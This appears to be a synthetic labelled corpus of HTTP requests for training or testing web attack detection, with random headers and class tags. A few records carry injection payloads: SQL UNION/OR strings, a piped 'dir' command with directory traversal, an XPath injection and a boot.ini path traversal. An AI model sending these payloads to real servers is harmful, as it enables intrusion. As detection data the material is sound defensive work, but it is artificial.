Date: Fri, 06 Feb 09 01:09:41 GMT
ETag: W/"eSGBUSsnP9_6ns8"
Expect: l1eoota=ohralgbi;aakL5e
From: ensea8e@sodznnc.it
If-Modified-Since: Sat, 28 Nov 09 02:02:56 CET
If-Unmodified-Since: Thu, 05 May 05 02:50:07 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 27 Feb 08 10:22:11 UTC
Max-Forwards: 28
MIME-Version: 6.0
Pragma: dioryosA='42np1'
Proxy-Authorization: Digest uri=http://sniw.net/oseoo/7nuds5/tfhcgi.wmn
Authorization: Basic YW9tZDplcmVwY25xaQ==
Range: 12361-,4-
Referer: http://ufcse.com/28g6mo/w62b5e/nitsfso.php
TE: chunked;q=0.2,deflate
Trailer: Accept-Language
User-Agent: e1Yzgg http://www.emEte.st
UA-CPU: Sparc
UA-Disp: 927,0967,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 335x343
Via: 6.8 www.rHezAe.htm, Ytei/8.3 101.76.198.144, 6.6 39.78.190.184
Transfer-Encoding: tnpon
Upgrade: Itor/8.8, int/1.5, dtfmcr/2.5
Warning: 846 14.21.113.100 "fyetrt" 
X-Forwarded-For: 14.228.155.87
X-Serial-Number: 693373977262
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26585
Start - Id: 27003
class: Valid
GET /rNTiEWgLnsqmJ/6mswof.msf?tundHsarr=nph-ka&vyHmCbtU=83790 HTTP/1.1
Host: www.nIltparet.de
Connection: oayinebh
Accept: */*
Accept-Charset: windows-1253;q=0.9, koi8, x-mac-ce;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 137.90.213.78
Cookie: childMlaPx=824500512;n4byaaemi3U=tyqz;ice=rgc.hz
Cookie2: $Version="7"
Date: Fri, 23 Jun 06 06:12:48 CET
ETag: "JWpM6Hmn0IlLRUOMc"
Expect: 100-continue
From: eEtd@ots6nnd.gov
If-Modified-Since: Wed, 05 Aug 09 14:10:19 CET
If-Unmodified-Since: Sun, 27 Dec 09 05:05:57 CET
If-Match: "jJ3Gwyn_f14VlQ2"
If-None-Match: *
If-Range: Thu, 02 Nov 06 22:04:34 CET
Max-Forwards: 4
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic b3RuaWFSYTpodG5vdGk=
Authorization: Digest nonce
Range: -1,-82529,0822-
Referer: http://0oejte.net/nottsrro/hralecd.tiff
TE: trailers,gzip;q=0.6,trailers
Trailer: Accept-Charset
User-Agent: nvySlPCqMZ http://www.tissOke4.de
UA-CPU: StrongARM
UA-Disp: 254,4962,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6860x985
Via: 9naoS/6.7 www.ripiilzH.css
Transfer-Encoding: identity
Upgrade: rt4na/4.6
Warning: 854 www.n0sd9.jpeg "enrpaOp6nyr5N9o" 
X-Forwarded-For: 126.84.101.124
X-Serial-Number: 39801
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27003
Start - Id: 30054
class: Valid
GET /elMHTJm14Hn4V/tie4SfiqcHiE/TriioAeaebeiaih/h8stdlan3si/7E49s/VuOSLT2f-4/e4ntybseije0hle/tJn6h/ttcehTdro9adt/s8Nsxmcizkatmyeoner/tcnrt4Odeh.asmx?1o=0832&uNton7iwbuoen1c=276 HTTP/1.1
Host: www.otf41z.ch:12924
Connection: 3iaoR
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: d-xe;q=0.7, ov-os, sRl6sl-aE;q=0.8
Cache-Control: only-if-cached
Client-ip: 21.39.235.102
Cookie: sae=yV5l14b;q.RLNNrurJD=iii8SmrG
Cookie2: $Version="16"
Date: Sat, 20 Mar 10 08:02:12 CET
ETag: "Fqhvp2EUAUOrR5EZ774T"
Expect: 100-continue
From: aeeNsEvt@wbsohnw.st
If-Modified-Since: Fri, 05 Mar 10 15:10:46 CET
If-Unmodified-Since: Fri, 20 Apr 07 10:09:39 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 02 Nov 08 21:05:02 GMT
Max-Forwards: 83
MIME-Version: 5.6
Pragma: thltee='khssC'
Proxy-Authorization: Digest nonce
Authorization: NTLM MWV0MGVhbmkzVHRyb21uM3I0aXIwcGJ1Q3lvbml1WXZ3bGUzcmFpZ2xkbg==
Range: 801-,-797
Referer: http://natiHa.ch/YrdIpfm/idta.cgi
TE: trailers,gzip
Trailer: Referer
User-Agent: Mozilla/3.5 (Machintosh; U; PPC Mac OS X 3.7; du-oO; rv:9.9.0) Gecko/17553015
UA-CPU: StrongARM
UA-Disp: 794,239,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8553x7465
Via: 0.1 www.5nmr.jpg, FTP/5.3 www.lEse.jpg, HTTP/4.9 8.59.146.114
Transfer-Encoding: compress
Upgrade: ajj/5.8, Horns/2.4
Warning: 581 www.tnjva9ml.shtml:8444 "e1srtmxWdaoorc7sra" 
X-Forwarded-For: 255.243.109.163
X-Serial-Number: 243330147588053404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30054
Start - Id: 3898
class: Valid
PUT /0y51U09/dFf/hetgdmgesMezne7uh/mH05d5KrdeDYoCyfJf./_W4EU1IKftpqid/E1rwEohfy/h8iett/-mzQzJJ@Ds/rZdkLtfWf53a.exe? HTTP/1.0
Content-Length: 32
Content-Language: irs9oi
Content-Encoding: deflate
Content-Location: http://anzteaol.ch/iwrF/tteooa/ekeekTi/svspzer/rChtowpt.mp3
Content-MD5: c2lvclJlYVRidXQxNXZjMA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Jun 05 10:08:09 GMT
Last-Modified: Sat, 01 Apr 06 02:24:09 UTC
Host: www.oseeo7rx.ch
Connection: t6eeeost
Accept: audio/*;q=0.4
Accept-Charset: *
Accept-Encoding: identity, gzip, deflate
Accept-Language: howH-OOujsyap;q=0.0, nsst-e;q=0.9
Cache-Control: 3lycyn='romxetge'
Client-ip: 59.129.2.242
Cookie: rrite38htiethf=r68Vy_
Cookie2: $Version="795"
Date: Sat, 27 Mar 04 02:25:27 UTC
ETag: "bxyyir1MhmyaT3oI"
Expect: rult
From: iriuh@orcqa.com
If-Modified-Since: Mon, 20 Mar 06 22:26:07 UTC
If-Unmodified-Since: Tue, 17 Oct 06 09:11:56 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 07
MIME-Version: 1.5
Pragma: g8asI=hsm
Proxy-Authorization: eifolu 4ediEcn=nOfs3b
Authorization: Digest response="aEbE1F9Dc1AD750ABF6FaEC71AA3da2C"
Range: -7148,2780-
Referer: /eehaa/ushErna/hhttmN9m/Mawo.php
TE: deflate,deflate;q=0.2,deflate
Trailer: User-Agent
User-Agent: Mozilla/5.2 (Machintosh; U; PPC 0.3; mt-75; rv:7.2.4) Gecko/78870027
UA-CPU: Sparc
UA-Disp: 837,1241,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 993x108
Via: HTTP/9.3 161.243.16.187, HTTP/1.5 www.rsa4.htm
Transfer-Encoding: deflate
Upgrade: qbtdne/8.9
Warning: 738 www.osltlmZp.shtml:65942 "mnse" 
X-Forwarded-For: 18.27.104.194
X-Serial-Number: 537380175884943310
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aeoehe=1874&F_CJyRfU=d.015G_1-MA

End - Id: 3898
Start - Id: 41779
class: SqlInjection
GET /dtlhssti5hohdo/rCrxqsKzwNtC72N_/ixf1AN5av/ldw/GFS/sNNJCcEK/bhrsC0veeTy/mU5FTIWvWBIc31/no5os4.png?5bealDotu=5540828&yestl=sSbH19Mpzu9G&9ehnb=q&ITTbmkNt=F6hhcshtaE6ei&.-ceYeWiformHftp=iU8CHUfo7&aayipayiu62MNl=%27%29++++UNION+ALL+SELECT+84+++++FROM+++++ereOsah++WHERE+++++%28%27%27++++%3D++++%27&edit600nui=249797&Eisia6a=i&t3J0at5nph-=Euwnssmnpvnus&swo4PxEuHg=852&Aexss5o=dbrms&q9cAnanholHc=i%3Bfaed7mehs HTTP/1.1
Host: www.ney8sO.de
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 19.38.3.115
Cookie: XNwgetXDT=veir;opTHtCewhn=655926;moiDeRr7rncas6=04109
Cookie2: $Version="725"
Date: Thu, 29 Jun 06 19:04:26 UTC
ETag: ".4g273Gu0e1YegQr"
Expect: oT8d=iIlx;zinlIOcf
From: rhuEDm@qpruheT.de
If-Modified-Since: Mon, 25 Apr 05 05:39:38 CET
If-Unmodified-Since: Tue, 09 Jan 07 19:43:26 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0076
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ayrepssY"
Authorization: xioe0i emhA=efh6etg
Range: 4745-5836
Referer: http://cund.org/eowe9ji/Qnaun9/e0cnad/h2lr7K.jpg
TE: trailers,trailers
Trailer: Upgrade
User-Agent: eeeuwmrL6c (ekl.Q7B; fGbZwf; t@xA5HcyF; i7E2-zA1dS; eRRzFfA)
UA-CPU: x86
UA-Disp: 079,3300,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5624x146
Via: HTTP/5.4 www.eXara.jpg, suc/1.2 www.ehed3r.js:55
Transfer-Encoding: deflate
Upgrade: ped/5.7, utiwa/4.3, NDinca/1.6, HleG/8.5, 6ot/6.6
Warning: 899 www.hlrs.js:0974 "osaznrsham4kiehae5n" "Mon, 18 Jul 05 24:25:09 CET"
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 79451842006720281
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41779
Start - Id: 5044
class: Valid
POST /lsmt.php3? HTTP/1.0
Content-Length: 146
Content-Language: jsya8sy
Content-Encoding: identity
Content-Location: http://www.94ekeih.it/9ahe/odlawiy/reAcn/eefcre/untUn.pdf
Content-MD5: enJSb3huaXRlYWFubmRvTw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 May 06 05:52:28 UTC
Last-Modified: Sat, 19 Jul 08 04:48:34 UTC
Host: www.aOe7ahd.cz:3
Connection: close
Accept: audio/*;q=0.3, video/*;q=0.2
Accept-Charset: iso-8859-8, shift_jis, hz-gb-2312;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: 4u-sw4w, elni-ace9iss;q=0.4, O2-se09ijo
Cache-Control: max-stale
Client-ip: 190.8.87.79
Cookie: uisecrerr5hfr=+u/;B46@xt2l-YN7=799;_GpmtMX=fnfs;rps=8148608;iimiodgnCxeEf=eOF
Cookie2: $Version="253"
Date: Tue, 18 Mar 08 24:08:38 GMT
ETag: "G.2NOI9hhXcPwm7wQe"
Expect: 100-continue
From: Qneaamdm@6uncL.it
If-Modified-Since: Fri, 14 Nov 08 08:50:39 GMT
If-Unmodified-Since: Fri, 26 Mar 10 08:55:02 GMT
If-Match: "xl7i6TJR_loj_laRoZ"
If-None-Match: *
If-Range: Wed, 30 Nov 05 08:04:28 UTC
Max-Forwards: 0
MIME-Version: 5.2
Pragma: atl=Wl
Proxy-Authorization: Digest username="diwistsp"
Authorization: Digest response="47966E291927D6cDaB2D49716ba1adc5"
Range: -809077,653-170430,-158191
Referer: /naa5mv.cgi
TE: trailers,deflate,chunked;q=0.3
Trailer: Pragma
User-Agent: Mozilla/8.9 (X11; U; Unix 2.7; s0-bN; rv:3.4.6) Gecko/09082694
UA-CPU: StrongARM
UA-Disp: 522,847,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 561x459
Via: 5.6 25.131.7.204, 3.6 115.40.136.225:12
Transfer-Encoding: identity
Upgrade: 9Ehwn/4.8, rwi0/3.3, UStake/0.9, reEr0s/4.3
Warning: 144 132.134.76.239 "tllinotpmmirsafatdm" 
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 4278747254
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

nfichoudroa=EjPSe&0wmoel7r=5&atiht8stenA=psa3dm&oo2Sfvsa9deoen=@g&p0nefaOcngdh=51&trzwcct=c3ct&to1group by=f0.t2i.mJ7&9ciwlcegi5ttcpe=peusg8amnf

End - Id: 5044
Start - Id: 7657
class: Valid
POST /udfhi/gPYM/wf_NwuuyCCKWS/ees6azcaqnp3zRdeotg/D6netkonao/rasxVtcyrCun.htm? HTTP/1.1
Content-Length: 304
Content-Language: ihnHrm,nienato,r
Content-Encoding: deflate
Content-Location: /ffaI/eteardc/gyan.cfm
Content-MD5: dGhBYWVscEVlNXdpYXFycw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 17 Sep 05 06:39:51 CET
Last-Modified: Thu, 15 May 08 06:11:05 GMT
Host: www.rcjtIiote.st
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: e-h, luhsct-hS
Cache-Control: hr='n5e'
Client-ip: 41.206.202.253
Cookie: frreEmatwu4buep=zki3n;rdenl0NaNqO=949310;AF5cSL4v6E=3715;mRscarofsCosr=DzhtfZ
Cookie2: $Version="237"
Date: Sun, 22 Feb 09 19:25:55 UTC
ETag: ".0vKLyCrSW56x--N"
Expect: ge79=oeetHh
From: pKiyxfx@wcrhasEw.biz
If-Modified-Since: Tue, 10 Nov 09 21:14:33 CET
If-Unmodified-Since: Sat, 24 Apr 04 16:23:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 09
MIME-Version: 0.6
Pragma: alp='rq'
Proxy-Authorization: Digest username="aornud0"
Authorization: ieeet stas=bhuwi
Range: 011790-
Referer: http://www.shesruh.net/dtfToQr/nenrnfin/kOot/0aWifg.wmn
TE: trailers,deflate
Trailer: Accept
User-Agent: ejscvZ@W0 http://www.tmasdAa.it
UA-CPU: 68000
UA-Disp: 319,9267,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0413x678
Via: 6.4 99.7.252.41, 9.3 107.182.218.6
Transfer-Encoding: vseqpz; EtfW=iedgsC
Upgrade: ilArae/6.1, a3t/9.5, h6e6z/1.8
Warning: 017 54.146.31.35 "emaeavHx" 
X-Forwarded-For: 59.74.190.194
X-Serial-Number: 117057517
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nu4dweTzX3mn=sHar<tnY0dc?;n&Fteolnitsbhagt=x3&XHevalZukp_hcb=orgdtxels?&Rsljfc91Phlo3oz=6&jfotrnlkl=sinemnIneeun&-OSewgetmyTb04=rMPDXfFHMqQ&rOD6o.2YVaV-=617&geho=4&F7X1wf=hn@kc.KbX_jO&thnuId7es=7892&aeooe=31&irrtsadeoCsi=lP3Ztd13Xi&dyt=esWgw&aao0bsa=8700689124&9mnhehkaEkuntu=xkrdTeawtoneniv0uo

End - Id: 7657
Start - Id: 13642
class: Valid
GET /qPWBMipq@hzKJl@_/swttpfipc/bsi/m9o/0iqw2QZ5KQ4H-ZO/lK6wxpy3/zP/swot/bionaeert1se5aieeib/c6dNwRMe-eq0pf3@yY7/oFHwU06UNg7C6rwn.jpeg? HTTP/1.0
Host: www.nrea.de
Connection: stsl
Accept: image/gif;q=0.6, audio/basic, video/mpeg;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale=46386
Client-ip: 196.2.232.227
Cookie: sanrsTnANrf=eedNeeool;rmib=893659;taiy=3890;sjtitetN6c0et=itdh1n'g1m
Cookie2: $Version="758"
Date: Wed, 31 Oct 07 05:55:33 UTC
ETag: "K9vOMUkI3MCJEL5@HD"
Expect: osehdeM=uiape6e
From: 2uses@EiiTw.cz
If-Modified-Since: Wed, 20 Feb 08 14:48:36 CET
If-Unmodified-Since: Tue, 14 Sep 04 18:17:22 CET
If-Match: "KvSFoCUnTI5uY4kalnVv"
If-None-Match: *
If-Range: Wed, 01 Sep 04 04:05:28 GMT
Max-Forwards: 936
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM eWRkY3Y1ZnNhRGZuY3Jpc292b3Rhb2hlaXRzQm9jZXQzaWg2ZGUxcmFlNGhibmNh
Authorization: NTLM ZXByc3JrN2FvZW5rZ3Nzbm5kbWRoZTZ0b3EzZjZlZndzbHI=
Range: 61-
Referer: http://www.iral25.be/r3xColfi/h07nue4o.doc
TE: trailers,chunked
Trailer: Warning
User-Agent: Mozilla/7.8 (X11; U; Open BSD i586 7.5; rn-lo; rv:8.9.0) Gecko/67299259
UA-CPU: StrongARM
UA-Disp: 2950,5748,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6148x9235
Via: FTP/3.7 www.Arnnrgil.tiff, 5.8 34.237.200.250:883
Transfer-Encoding: compress
Upgrade: inj/7.8, aoi/1.3, oOi/5.0, dits/3.0
Warning: 242 www.aseaogr.html "nerangaikenWialAe" 
X-Forwarded-For: 244.48.166.167
X-Serial-Number: 08617413458171074212
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13642
Start - Id: 44378
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.1
Host: 215.171.191.196
Connection: e1zte8IR
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.0
Accept-Language: *;q=0.4
Cache-Control: max-stale=388
Client-ip: 90.164.80.82
Cookie: X2ncYY=r 9elh ;trHxneed8rcdexd=shyduc8;sNevcNoc=226157693;stahhedmenlest=ek;sDaDe=]E
Cookie2: $Version="962"
Date: Thu, 11 Nov 04 12:02:03 CET
ETag: "hRtyES0J8kvkJHkX"
Expect: sHulneie=8tshds;ergxc
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Mon, 23 Jun 08 11:44:47 UTC
If-Unmodified-Since: Wed, 10 May 06 04:09:41 CET
If-Match: "T4zlc4FMAAGr3y8"
If-None-Match: *
If-Range: "4SoVXSAvOO8jfGxd"
Max-Forwards: 95
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Basic YlJoZWlnOjN6aW5lR2I=
Range: -592489
Referer: http://rezdIlws.be/umiaeai/da3r/goiusme/smoato/zfie.nsf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.0 (Windows; U; Win98 1.2; lw-nd; rv:5.7.1) Gecko/65306485
UA-CPU: Sparc
UA-Disp: 0327,603,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 347x4806
Via: nheee/9.2 212.196.58.81
Transfer-Encoding: compress
Upgrade: HeiarI/6.4, enio/6.7, DHqogf/0.4
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44378
Start - Id: 35553
class: XPathInjection
POST /XfrsaEry/aso/UL/xDh4Yzz/drzFVx/VUZ-/aivshiKw3/fYsiMRdLkMHKrnR.jpg? HTTP/1.0
Content-Length: 159
Content-Language: wt01scun,Ritn,r5Izi8
Content-Encoding: compress
Content-Location: http://muots.org/sat4d2a.pl
Content-MD5: YVJ0ZWVnc2hvZXJtdzB0Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jul 05 20:59:35 GMT
Last-Modified: Sun, 05 Jul 09 14:14:48 CET
Host: 209.157.159.182:0534
Connection: otllonas
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: ii-s9an
Cache-Control: no-cache
Client-ip: 89.252.62.136
Cookie: Ohna=ehuSja@pey;ur33ltsnAalt=szinhr05fm;bt=z@vqoI;MdYnodeAhftpeval=0nadamo
Cookie2: $Version="447"
Date: Wed, 30 Jan 08 11:18:30 CET
ETag: "-FwfO-oPyhjIc7MMKhL"
Expect: 100-continue
From: nnlhEei@dheee.ch
If-Modified-Since: Sun, 06 Jul 08 20:29:05 GMT
If-Unmodified-Since: Fri, 02 Dec 05 23:20:52 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 05 Sep 04 02:45:40 GMT
Max-Forwards: 85
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: len2te ytHaNuew=yalote
Authorization: Basic RWZldjpkcmVlbmRpbQ==
Range: 1158-964,-612192
Referer: /Ud8rtaas/ieumrse/2eteains/rsd0eenH.pdf
TE: deflate;q=0.5,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/1.5 (Machintosh; U; PPC Mac OS X 0.1; ng-9A; rv:2.4.2) Gecko/69437555
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-Pixels: 1921x126
Via: 3.2 57.24.69.189, 2.2 179.239.59.119, FTP/0.6 www.fe2anub.gif
Transfer-Encoding: gzip
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 559 www.obo9.js "F7ceoat8n5sa5ne" "Wed, 18 Nov 09 09:39:58 UTC"
X-Forwarded-For: 20.224.84.217
X-Serial-Number: 42337082181389056
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NcmmjeBakr=bsy&thTsmSnwf=9543047&aneb1aEec=aKQ&vilDlHeau3t=keLnin'    or  path/child::node()[position()=N] or  'suoieee'    =   '

End - Id: 35553
Start - Id: 41810
class: SqlInjection
GET /esfeohdee/defmhracre/ntk3Kyw/sztt1NDMbgroup byva/antel/F6lVaCYdgkqimgX8Q/f9/esalql7svt0enewao2/ftme/ttnb.jpeg?ibrdygwt=%27+++++OR++++%27%27++++%3D+++%27&irctwzetdme=iaM%40SiLtNn HTTP/1.1
Host: www.nfynmydh.com:80
Connection: u3lLsn
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: s-1eftoes;q=0.1, a7Nekb-aedspd, ctnnth-rgua
Cache-Control: max-stale
Client-ip: 175.74.180.28
Cookie: UeoEOautda=14;dlmn8obDm=eenorileentnhh3Nm;689YvRH6U2Z3=364407;odrEdn8eri1at=w f6a
Cookie2: $Version="4"
Date: Sat, 15 Mar 08 20:51:15 GMT
ETag: W/"B9vez_6N2C2hWas2l"
Expect: 100-continue
From: ame9p@neehptrbo.fr
If-Modified-Since: Thu, 06 Apr 06 21:41:49 UTC
If-Unmodified-Since: Mon, 16 Nov 09 06:40:21 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Jun 04 16:44:52 UTC
Max-Forwards: 622
MIME-Version: 8.0
Pragma: nner0e=nccidys
Proxy-Authorization: NTLM bm5leWhtb3RheFRJaWVoc3RlaGN0dG1hN2VkaUhhcWRhZFVzaGN0dW51d2U=
Authorization: FPtis ticgSoh=utIeeae
Range: 340098-821
Referer: http://www.setSIot.fr/bfmd9fEv/nlIivoN/nshGe.swf
TE: trailers,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/1.7 (Windows; U; Win 9x 2.2; Ge-oa; rv:2.6.9) Gecko/46969697
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7095x5636
Via: 0.0 151.82.173.75, FTP/7.6 129.236.65.13
Transfer-Encoding: compress
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 706 www.bha5ea.gif "rttdDznEnnn" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 34361564811
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41810
Start - Id: 26611
class: Valid
GET /yDX7im.aspx? HTTP/1.1
Host: www.nerer.com
Connection: ebCa
Accept: */*;q=0.8
Accept-Charset: macintosh, x-mac-turkish;q=0.8, ks_c_5601-1987;q=0.7, iso-8859-8, iso-8859-9;q=0.1
Accept-Encoding: gzip, compress;q=0.2, identity, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 60.195.247.35
Cookie: xtssageashaiydA=46052976;Elhl=Ou5eglgTaouToue;neoaansi=herhdrtpuloet iframeautoexecw
Cookie2: $Version="289"
Date: Sun, 26 Sep 04 12:59:26 GMT
ETag: W/"II_lsj3@uP1CR0tv92t"
Expect: tntonh
From: ceebh8z@anOtt1nhog.cz
If-Modified-Since: Fri, 14 Mar 08 09:46:49 UTC
If-Unmodified-Since: Mon, 01 Oct 07 09:38:04 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Jun 06 24:11:17 CET
Max-Forwards: 9
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic ZWFzcmZUczY6YmlkaXc=
Authorization: Basic aXJ3aGE6cmxuM2xhc2k=
Range: 3-,788456-3,6670-026581
Referer: /yfr7r.dll
TE: chunked;q=0.7
Trailer: Referer
User-Agent: Mozilla/8.1 (Machintosh; U; Mac OS X 8.6; oe-hI; rv:1.1.0) Gecko/77707419
UA-CPU: Sparc
UA-Disp: 3286,345,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 190x433
Via: FTP/9.1 www.eggi8.shtml, eon/9.6 164.207.33.134, apb/3.8 www.teuhIa.jpeg
Transfer-Encoding: deflate
Upgrade: m8nn/6.2, dh8taa/7.5, 0vmmct/2.3, onl/6.9
Warning: 472 51.16.225.72 "ie2nQuyerrj" 
X-Forwarded-For: 227.175.6.41
X-Serial-Number: 21651458708939157204
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 26611
Start - Id: 16548
class: Valid
GET /aiIhHwj8j5D/omCnro/ett/j-BYVEidtZS7/eirvoerdotnLu/etnEemueeMuLd/kfeLwIP/PMij_scriptPw/MER6y/yna.png?dQqLP3qo.k1L=668&t5v=eZqY_fxLEI HTTP/1.1
Host: 95.59.115.183
Connection: oreeanna
Accept: application/*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 110.75.170.196
Cookie: @jNUx_=%]aOw93Rdr;ovt=svLx5luI4N5z;7wesuo=4
Cookie2: $Version="6"
Date: Fri, 06 Nov 09 07:14:51 GMT
ETag: W/"tbbxWf8euU2lA2q61VUP"
Expect: 6otl
From: o7mnatoB@rrengt.ch
If-Modified-Since: Sun, 17 Feb 08 05:44:04 CET
If-Unmodified-Since: Wed, 16 Apr 08 21:10:06 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 08 Aug 04 13:39:25 UTC
Max-Forwards: 1087
MIME-Version: 3.0
Pragma: dtKahuo='hvm'
Proxy-Authorization: Digest qop=itaaniiM
Authorization: Digest opaque="0eeimsg"
Range: -098113
Referer: /rthb3slE/rbaxtuee/tlisgs/tuqjae/hnAni6en.tiff
TE: trailers
Trailer: If-Range
User-Agent: eesh/3.5
UA-CPU: x86
UA-Disp: 2808,9760,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 9430x4545
Via: FTP/8.6 www.edxec.png
Transfer-Encoding: gzip
Upgrade: yru/2.9, iNeed/4.4, EOio/3.5, a5xeU/5.9, 5omle/9.1
Warning: 574 www.ragnqoh.htm "mte2te" 
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 4070028617537255
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 16548
Start - Id: 36096
class: PathTransversal
GET /AaQJ.rsystem7Uj/weeo/1PUbOQ5KGRr78hAal/wN4Tmdhu.bin?etest=oF6CeujPxM&oSeEr=eq5eneP&Znode6MzfrGY8=k%3A%5Cwinnt%5Cboot.ini&rdiZdsnn=shutdowntth&ee82=0&IWPRTP=helvrIttfI&3toAe4t=lnc%28O&8i0oeroEwbi=o8bn&ahqaawOene=31595&Uons=t1x&ooeesiyhnreyrw4=ySgt4rhroaehdi HTTP/1.1
Host: 79.173.140.48
Connection: 2tiihdz
Accept: */*;q=0.3
Accept-Charset: x-mac-japanese, euc-kr;q=0.5, iso-8859-2;q=0.5, cp-936, ks_c_5601-1987;q=0.6
Accept-Encoding: gzip, gzip, deflate;q=0.6
Accept-Language: t9e-yhatl, acilHca-rhal
Cache-Control: xh=laa8
Client-ip: 200.55.112.27
Cookie: 0telnet@rmuU=3eoOz@atmplw;fromPRLzPE73Au=t(e;e;oBL.NbKmV=aiukiabhans0lw8;4h=EsdroixoOr4;KR_0AfzpassthruTh=$
Cookie2: $Version="6"
Date: Sun, 02 Sep 07 02:22:03 GMT
ETag: W/"Y2c3Smyqo1dEDpGFg_"
Expect: dlci7
From: 2srfon@a2wsst04Ft.cz
If-Modified-Since: Mon, 25 Oct 04 20:58:02 UTC
If-Unmodified-Since: Fri, 26 Sep 08 23:25:49 UTC
If-Match: "ZKP-@ZlVh9kg0BH7"
If-None-Match: *
If-Range: "lrbVR.TGMoTJnsZic_n"
Max-Forwards: 8933
MIME-Version: 3.5
Pragma: DjRsrf=5giir
Proxy-Authorization: Digest username="ftps"
Authorization: rtt8d pqeoe=bouttla
Range: 78-
Referer: http://www.eaght.org/sqoieor/tab0Yr04.pl
TE: gzip,trailers,chunked
Trailer: Pragma
User-Agent: vnlgD (sXWtYP-Arb; wwq07DyRi)
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6563x796
Via: FTP/5.1 81.57.220.255, 5.0 www.ebni.png, 1.0 100.87.162.215
Transfer-Encoding: gzip
Upgrade: Fd1sk/0.3
Warning: 647 231.206.148.64:01 "5tdtn" 
X-Forwarded-For: 76.95.176.105
X-Serial-Number: 5507795373725385751
----: --------------------
